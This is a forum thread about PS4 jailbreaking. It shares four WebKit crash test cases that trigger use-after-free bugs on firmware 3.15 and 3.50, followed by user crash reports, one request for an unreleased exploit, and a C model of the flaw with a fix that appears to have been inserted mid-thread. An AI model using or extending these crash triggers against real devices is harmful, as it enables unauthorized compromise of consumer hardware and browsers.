PS4 Jailbreaking | Thread starter: mcmrc1 | Start date: Apr 10, 2016 at 12:04 PM
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code:
<iframe></iframe><object onbeforeload="crash()">
<script>
if (window.testRunner) {
    testRunner.dumpAsText();
    testRunner.waitUntilDone();
}

// Called from the object element's beforeload event: reads the iframe's window
// (forcing layout) and then reopens the document from inside the event, while
// the loader is still in the middle of handling the <object>.
function crash() {
    document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
    document.open();
}

document.body.offsetLeft;
setTimeout(function() {
    document.close();
    document.body.innerHTML = 'PASS if not crashed.';
    if (window.testRunner)
        testRunner.notifyDone();
}, 1);
</script>
2. Entry point:
Code:
<input id="t1" type="time">
<script>
var time1 = document.getElementById('t1');

// Capturing beforeload listener on the document: each beforeload (the <embed>
// below triggers one) toggles the value of the time input while it has focus.
document.addEventListener('beforeload', function(event) {
    time1.value = time1.value ? '' : '23:59';
}, true);

if (window.testRunner) {
    testRunner.dumpAsText();
    testRunner.waitUntilDone();
}
setTimeout(function() {
    document.body.innerHTML = 'PASS if not crashed.';
    if (window.testRunner)
        testRunner.notifyDone();
}, 100);
time1.focus();
</script>
<embed src="data:text/html,PASS"></embed>
Also the source code from the WebKit from Sony ;)
3. Entry Point:
Code:
<script>
// Fuzzer-style warm-up (defined but not called in this case): the loops are
// empty here, then a garbage collection is requested (CollectGarbage on IE,
// window.gc on WebKit builds that expose it) so freed objects are released.
function inituaf() {
  for (var i = 0; i < 100; i++) {
    for (var j = 0; j < 32; j++) {
    }
  }
  try { CollectGarbage(); } catch (err) {
    try { window.gc(); } catch (err) {
      for (var i = 0; i < 100; i++) {
      }
    }
  }
}

// Runs from the <object> element's beforeload event. Every step is wrapped in
// try/catch so the sequence continues whatever fails; the "//line N" comments
// are the fuzzer's references into its original test case.
function eventhandler2() {
  try { var00002 = document; } catch (err) { } //line 2
  try { var00003 = var00002; } catch (err) { } //line 3
  try { var00043 = 0; } catch (err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch (err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch (err) { } //line 47
  try { var00063 = -1; } catch (err) { } //line 67
  try { var00064 = 0; } catch (err) { } //line 68
  try { var00045.scrollTo(var00063, var00064); } catch (err) { } //line 69
  try { var00002.write(); } catch (err) { } //line 185
}
</script>
<object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code:
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>
function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    // The focusout handler removes the iframe from the tree, so the frame
    // disappears in the middle of the focus change that dispatched the event.
    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
[Image: PS4 3.15 Firmware Entry Point.png]
 

Comments

@CnCore I've seen a video on YouTube, I can link you. ^_^



I can get the PASS without crash on mine as well on 3.50FW, and the one with a dialog alert box too, but I can't get an exploit to run with either of them. This is at least a good sign we can run it, and is probably a good starter entry point. It just needs some know-how to run this use-after-free vulnerability to exploit it further. I'm going to keep trying a few other things, but it will probably be Thursday night before I can look at it again.

Here are a couple of good articles on use-after-free vulnerabilities if you want to take a look.

https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf

https://securityintelligence.com/use-after-frees-that-pointer-may-be-pointing-to-something-bad/

Wish someone knew something about this code...says exploit was never released to the public.
http://www.securityfocus.com/bid/66243/info
 
Just googled: WebKit Use-After-Free Remote Code Execution Vulnerability - if someone knows a secret place where to grab it or has it, please speak up. I wonder, @sEKTOR, do you know anything about this kind of stuff? You seem to.
 
This is a CVE from 2014.
It exploits a dangling pointer after the object has been referenced.

Instead of dereferencing the variable where the object is held, it frees the memory of what was allocated to the heap before the trace happens.
- The stack trace of when the object was freed can also be dumped via the "!heap -p" command in WinDbg.

This is a memory corruption bug in FreeBSD as well.
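The dangling-pointer pattern this post describes, in the shape entry points 1 and 4 above take (an event handler tearing down the object its caller is still using), as an added C model that is not code from the thread or from WebKit: the node pool, the names and the handler are constructed here. The unsafe dispatch returns -1 once the handler has freed the node; the hardened dispatch holds a protecting reference across the event, the approach behind WebKit's protectedThis idiom.

```c
#include <string.h>

/* Toy ref-counted DOM node (constructed for this example). Nodes live in a
 * fixed pool so a "freed" node can still be inspected without real undefined
 * behaviour; a real allocator would hand the memory to the next allocation. */
typedef struct Node {
    int  refcount;                      /* tree reference plus temporary protectors */
    int  freed;                         /* set when refcount reaches zero */
    char name[16];
    void (*on_focusout)(struct Node *self);
} Node;

static Node  pool[4];
static Node *tree_child;                /* the tree's single strong reference */

static Node *node_new(int slot, const char *name, void (*h)(Node *)) {
    Node *n = &pool[slot];
    n->refcount = 1; n->freed = 0; n->on_focusout = h;
    strncpy(n->name, name, sizeof n->name - 1);
    n->name[sizeof n->name - 1] = '\0';
    tree_child = n;
    return n;
}
static void node_ref(Node *n)   { n->refcount++; }
static void node_deref(Node *n) {
    if (--n->refcount == 0) { n->freed = 1; memset(n->name, 0, sizeof n->name); }
}

/* Handler in the shape of entry point 4: focusout removes the node itself. */
static void remove_self(Node *self) {
    if (tree_child == self) { tree_child = NULL; node_deref(self); }
}

/* Vulnerable dispatch: the caller holds only a raw pointer, the handler drops
 * the last reference, and the caller keeps using the node. Returns -1 on
 * use-after-free, otherwise the length of the name it read. */
static int focus_unsafe(Node *n) {
    n->on_focusout(n);
    return n->freed ? -1 : (int)strlen(n->name);
}

/* Hardened dispatch: a protecting reference keeps the node alive until the
 * caller is done with it; the node is released only after the last use. */
static int focus_safe(Node *n) {
    node_ref(n);
    n->on_focusout(n);
    int len = n->freed ? -1 : (int)strlen(n->name);
    node_deref(n);                      /* destroyed here, after the last use */
    return len;
}
```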
 
some more tests on 3.50 needed :)

easy< method -> [LINKS]
Got "no memory available" in 3.50. Is this what we want to see? Or is it bad news? I mean... When you get this message does it mean that it is something to look at?

Edit: BTW I'd like to thank all the scene's members who make things like this happen. It doesn't matter if we don't get anything functional; you've already made an effort and a time (and money) investment to give us hope in the scene development. I really hope you get what you deserve[joke], which is a lot of sexy chicks knocking at your door praying for savage sex.[/joke]
Greetings!
 
@SorenAlke said four pages back that it should say what I got. Sorry for the question, need to read before posting. So I think it crashes, then gives you that warning "no memory left"/"no memory available" (don't know exactly what the warning should say in english because I have mine in spanish, holy synonyms), then the developer fu*ks the system! :rolleyes:
 
Got "no memory available" in 3.50. Is this what we want to see? Or is it bad news? I mean... When you get this message does it mean that it is something to look at?
This is exactly what you want. Because of the "no memory available" you can crash it in the first place.
There are plenty of exploits released for multiple platforms on https://www.exploit-db.com/

But to disappoint you, all this is not very useful for the end-user - yet.
As the title says it's 'just' an "entry point for testing". So for devs it's awesome :D
Although I think that most devs are still on 1.76 ;)
 
This is exactly what you want. Because of the "no memory available" you can crash it in the first place.
There are plenty of exploits released for multiple platforms on https://www.exploit-db.com/

But to disappoint you, all this is not very useful for the end-user - yet.
As the title says it's 'just' an "entry point for testing". So for devs it's awesome :D
Although I think that most devs are still on 1.76 ;)
Well, glad to contribute. I don't mind that this is not very useful to the user; I think this helps everyone who wants to develop something and is doubting whether to get into the scene. It's like "hey! watch what this scener did, let's try to replicate its results!". This is lik
 